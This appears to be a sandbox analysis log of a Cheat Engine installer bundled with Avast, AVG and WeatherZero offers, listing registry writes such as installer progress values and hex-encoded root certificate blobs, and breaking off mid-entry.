instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "18" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Main = "37" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "48" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "67" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "84" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Main = "2" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\SfxInstProgress = "42" avast_free_antivirus_setup_online_x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "File downloaded: ais_gen_crt_x64-82e.vpx" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Main = "35" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Updating package: ais_gen_tools_x64" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "File downloaded: ais_res-8e3.vpx" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "65" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "94" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Main = "13" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "File downloaded: ais_gen_tools_x64-8d0.vpx" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Extracting file: instup.exe" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "43" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Updating package: ais_cmp_rescuedisk_x64" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Updating package: ais_res" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "27" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "58" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "66" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Main = "12" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "85" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "55" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Updating package: ais_gen_protobuf_x64" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "23" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Main = "37" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Extracting file: AvBugReport.exe" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "6" instup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\DefaultIcon CheatEngine75.tmp Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\SfxInstProgress = "57" avast_free_antivirus_setup_online_x64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "56" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "72" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "9" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "41" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "52" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Updating package: jrog2" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "7" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "8" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "File downloaded: avbugreport_x64_ais-997.vpx" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Main = "50" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "File downloaded: ais_cmp_bpc-7e7.vpx" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Updating package: ais_cmp_bpc" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Main = "8" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Updating package: ais_shl_mai_x64" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "79" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "70" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Main = "9" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Main = "11" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\SfxInstProgress = "71" avast_free_antivirus_setup_online_x64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "38" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "78" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "89" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "27" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "37" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "56" instup.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde avg_secure_browser_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 WeatherZero.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e WeatherZero.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 CheatEngine75.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 CheatEngine75.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 avg_secure_browser_setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd CheatEngine75.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd CheatEngine75.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WeatherZero.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A CheatEngine75.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 CheatEngine75.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 